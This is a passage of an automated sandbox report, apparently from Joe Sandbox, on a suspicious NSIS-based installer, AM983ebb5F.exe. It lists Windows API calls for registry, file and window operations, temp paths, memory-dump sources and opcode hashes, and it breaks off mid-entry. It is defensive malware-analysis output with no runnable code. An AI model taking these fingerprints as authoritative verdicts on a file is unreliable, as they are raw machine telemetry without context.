                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                    • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                    • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                    • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2667972263-0
                                                                                    • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                    • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                    • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                    • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                    APIs
                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
• Opcode ID: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
• Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
• Opcode Fuzzy Hash: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
• Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
APIs
• GetDlgItem.USER32(?,?), ref: 00401D9F
• GetClientRect.USER32(?,?), ref: 00401DEA
• LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
• SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
• DeleteObject.GDI32(00000000), ref: 00401E3E
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
• Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
• Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
• Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
APIs
• GetDC.USER32(?), ref: 00401E56
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
• ReleaseDC.USER32(?,00000000), ref: 00401E89
• CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
• Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
• Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
• Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
Strings
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
• Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
• Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
• Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
APIs
• lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
• wsprintfW.USER32 ref: 00404E2D
• SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
Strings
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
• Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
• Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
• Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
APIs
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000023,00000011,00000002), ref: 004024DA
• RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,00000011,00000002), ref: 0040251A
• RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,00000011,00000002), ref: 00402602
Strings
Similarity
• API ID: CloseValuelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp
• API String ID: 2655323295-2591292428
• Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
• Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
• Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
• Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
APIs
  • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
  • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405EDF
  • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
  • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405F87
• GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
Strings
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsuD53D.tmp
                                                                                    • API String ID: 3248276644-2746982651
                                                                                    • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                    • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                    • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                    • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405EDF
                                                                                    • CharNextW.USER32(00000000), ref: 00405EE4
                                                                                    • CharNextW.USER32(00000000), ref: 00405EFC
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nsuD53D.tmp, xrefs: 00405ED2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp
                                                                                    • API String ID: 3213498283-2591292428
                                                                                    • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                    • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                                                    • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                    • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3081826266
                                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                    • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                    • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll), ref: 0040269A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp$C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll
                                                                                    • API String ID: 1659193697-2754003125
                                                                                    • Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                    • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                                                                    • Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                    • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                    • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                    • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                    • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                      • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                    • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                    • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                    • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406696,80000002), ref: 0040646B
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00406476
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: : Completed
                                                                                    • API String ID: 3356406503-2954849223
                                                                                    • Opcode ID: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                    • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                                                                    • Opcode Fuzzy Hash: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                    • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3081826266
• Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
• Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
• Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
• Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
APIs
• lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AM983ebb5F.exe,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 00405E78
• CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AM983ebb5F.exe,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 00405E88
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-224404859
• Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
• Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
